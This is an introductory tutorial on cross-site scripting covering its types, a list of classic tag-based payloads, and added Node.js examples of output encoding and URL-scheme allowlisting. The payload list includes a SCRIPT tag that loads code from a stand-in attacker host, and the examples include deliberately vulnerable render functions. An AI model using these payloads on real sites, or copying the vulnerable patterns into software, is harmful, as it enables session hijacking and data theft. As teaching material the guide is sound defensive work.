A Basic Guide to Cross Site Scripting (XSS)

Every day we hear that some website is vulnerable to XSS (Cross Site Scripting), because attackers constantly target websites through this vulnerability. Even the top tech websites have been found vulnerable to XSS. So the question comes to mind: what is XSS, and what damage can it do? We will try to answer these questions in today's post. Some top websites run Bug Bounty Programs to get these kinds of bugs reported and fixed before they are abused. As this is a basic guide, we will only give an introduction to XSS, its types, how it is used in an attack, and some examples with code.

Cross Site Scripting (also known as XSS; the older abbreviation CSS is avoided today because it collides with Cascading Style Sheets) is generally considered one of the most common application-layer attack techniques. It is ranked third in the OWASP Top 10 (2013).
Cross-site scripting is an attack technique that leverages flaws in the code of a web application to deliver malicious content to an end user's browser and collect some type of data from the victim. When an attacker introduces a malicious script into a dynamic form submitted by the user, a cross-site scripting (XSS) attack occurs. An XSS attack leads to undesirable effects: for example, the attacker gains the ability to capture session information and to peer into private user details such as IDs, passwords, credit card information, home address and telephone number, social security/tax IDs, and so on. If the targeted website does not check for this type of malicious code, abuse of its users is likely.
Types of XSS:
XSS attacks are generally divided into two categories:
  • Stored XSS (Persistent)
  • Reflected XSS (Non-Persistent)
  • A third type, DOM Based XSS, also exists but is less well known.
Stored XSS:
Stored XSS is also called Persistent XSS, and it is the most dangerous type of XSS attack. Stored attacks are those where the injected (malicious) code is not properly filtered and is permanently stored on the target server, such as in a database, a message forum, a visitor log or a comment field. The victim then retrieves the malicious script from the server when requesting the stored information. Since this vulnerability typically involves at least two requests to the application, it is also called second-order XSS.
Stored XSS can be used to conduct a number of browser-based attacks including:
  • Hijacking another user’s browser
  • Capturing sensitive information viewed by application users
  • Pseudo defacement of the application
  • Directed delivery of browser-based exploits
  • Other malicious activities
Reflected XSS:
Reflected XSS (also known as Non-Persistent XSS) is by far the most common type. Reflected attacks are those where the injected code is reflected off the web server, such as in an error message, a search result, or any other response that includes some or all of the input sent to the server as part of the request. Reflected attacks are delivered to victims via another route, such as an e-mail message or a page on some other web server. When a user is tricked into clicking a malicious link or submitting a specially crafted form, the injected code travels to the vulnerable web server, which reflects the attack back to the user's browser. The browser then executes the code because it came from a "trusted" server.
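To make both types concrete from the defender's side, here is an added example (it is not code from the original post) in Node.js. It shows a reflected search page and a stored comment list, each in a vulnerable form that concatenates user input into HTML and in a hardened form that encodes at output time. The function names, the in-memory comment store and the sample strings are constructed for this example; the payload is the one used later in the post.

```javascript
// Added example, not from the original post. Node.js, no dependencies.
// Shows the vulnerable and the hardened rendering for the two XSS types
// described above: a reflected search echo and a stored comment list.
// Function names and sample strings are constructed for this example.

// Encode the characters that change meaning in HTML text or attributes.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Reflected XSS: the query parameter is echoed straight into the response.
function renderSearchVulnerable(query) {
  return `<p>Results for: ${query}</p>`;
}

// Same response with output encoding: the payload is shown as text, not parsed.
function renderSearchSafe(query) {
  return `<p>Results for: ${escapeHtml(query)}</p>`;
}

// Stored XSS: an in-memory array stands in for the database or forum table.
const comments = [];
function addComment(author, text) {
  comments.push({ author, text });
}

// Every later visitor who loads the comment page receives the stored payload.
function renderCommentsVulnerable() {
  return comments.map(c => `<li><b>${c.author}</b>: ${c.text}</li>`).join('\n');
}

// Encoding at output time neutralises whatever was stored, so a record that
// slipped past input filtering still cannot run in a visitor's browser.
function renderCommentsSafe() {
  return comments
    .map(c => `<li><b>${escapeHtml(c.author)}</b>: ${escapeHtml(c.text)}</li>`)
    .join('\n');
}

// Rough indicator used only to compare the two outputs; real detection
// would parse the HTML rather than pattern-match it.
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// The post's own example payload.
const PAYLOAD = '<SCRIPT>alert("XSS")</SCRIPT>';

addComment('alice', 'First!');
addComment('mallory', PAYLOAD);

console.log(renderSearchVulnerable(PAYLOAD)); // <p>Results for: <SCRIPT>alert("XSS")</SCRIPT></p>
console.log(renderSearchSafe(PAYLOAD));       // <p>Results for: &lt;SCRIPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;</p>
console.log(renderCommentsVulnerable());      // second <li> still contains a live <SCRIPT> tag
console.log(renderCommentsSafe());            // second <li> shows the payload as text
```

The point of the stored case is that the fix lives at the output, not the input: the comment is already in the database, so filtering on the way in would not have helped any user who loaded the page after the record was written. Encoding at the place where data meets HTML covers both types with one helper.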
Some examples of XSS follow, focusing on the HTML tags that can carry a payload.
<SCRIPT> Tag:
The <SCRIPT> tag is the most popular way and is sometimes the easiest to detect. It can arrive in your page in the following forms:
<SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT>
<SCRIPT>alert("XSS");</SCRIPT>
<BODY> Tag:
The <BODY> tag can contain an embedded script by using the ONLOAD event, as shown below:
<BODY ONLOAD=alert("XSS")>

<IMG> Tag:
Some browsers will execute a script found in the SRC attribute of the <IMG> tag, as shown here (this is legacy behaviour; current browsers do not run javascript: URLs in image sources, but the same attribute is still a place where untrusted URLs must be validated):

<IMG SRC="javascript:alert('XSS');">

There are some variations of this that worked in certain older browsers (DYNSRC and LOWSRC are legacy Internet Explorer and Netscape attributes):

<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">

<INPUT> Tag:
If the TYPE attribute of the <INPUT> tag is set to "IMAGE", it can be manipulated to embed a script:

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

<LINK> Tag:
The <LINK> tag, which is often used to link to external style sheets, can carry a script in its HREF:

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
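All of the IMG, INPUT and LINK vectors above have one thing in common: a javascript: URL is accepted into an attribute such as SRC or HREF. HTML encoding alone does not stop that, because the payload is a perfectly valid attribute value, so the control is a scheme allowlist applied before the URL is written into the page. The following is an added example in Node.js (not code from the original post); the function names, SITE_ORIGIN and the sample inputs are constructed for it. It goes a little beyond the post's literal payloads by also checking the disguised spellings (mixed case, embedded tab, leading spaces) that a naive string-prefix check would miss.

```javascript
// Added example, not from the original post. Node.js (v10+ for the global
// WHATWG URL class), no dependencies. Function names, SITE_ORIGIN and the
// sample inputs are constructed for this example.

const ALLOWED_PROTOCOLS = new Set(['http:', 'https:']);
// Hypothetical origin of the site, used only to resolve relative URLs.
const SITE_ORIGIN = 'https://example.com';

// Returns the normalised absolute URL if its scheme is allowed, else null.
// Parsing with the URL class (rather than a regex or startsWith) is what
// makes this hold up: the parser lower-cases the scheme and strips leading
// whitespace and embedded tab/newline characters, so " javascript:..." or
// "java\tscript:..." still come out with protocol "javascript:" and are
// rejected like the plain form.
function safeUrl(value) {
  let parsed;
  try {
    parsed = new URL(String(value), SITE_ORIGIN);
  } catch (err) {
    return null; // unparseable input is treated as unsafe
  }
  return ALLOWED_PROTOCOLS.has(parsed.protocol) ? parsed.href : null;
}

// Minimal encoder for a double-quoted attribute value.
function escapeAttr(s) {
  return String(s).replace(/&/g, '&amp;').replace(/"/g, '&quot;');
}

// Builds an <img> from an untrusted source; falls back to a fixed placeholder.
function imgTag(untrustedSrc) {
  const src = safeUrl(untrustedSrc);
  return src ? `<img src="${escapeAttr(src)}">` : '<img src="/static/blank.png">';
}

// Builds a stylesheet <link> the same way; an unsafe value emits nothing.
function stylesheetLink(untrustedHref) {
  const href = safeUrl(untrustedHref);
  return href ? `<link rel="stylesheet" href="${escapeAttr(href)}">` : '';
}

// Constructed sample inputs: the post's payload plus a few disguised forms
// and two legitimate URLs.
const SAMPLES = [
  "javascript:alert('XSS');",
  "JaVaScRiPt:alert('XSS')",
  "java\tscript:alert('XSS')",
  "  javascript:alert('XSS')",
  "data:text/html,<script>alert('XSS')</script>",
  "/images/cat.png",
  "https://cdn.example.org/a.png",
];

for (const s of SAMPLES) {
  console.log(JSON.stringify(s), '->', safeUrl(s));
}
console.log(imgTag("javascript:alert('XSS');")); // placeholder image
console.log(imgTag("/images/cat.png"));          // <img src="https://example.com/images/cat.png">
```

Note what this check does and does not decide: it only constrains the scheme. A protocol-relative value such as //other.example/x.js resolves to https: and passes, so if resources are supposed to come only from your own hosts, add a hostname allowlist on parsed.host as well, and back it with a Content-Security-Policy so the browser enforces the same rule independently of the template code.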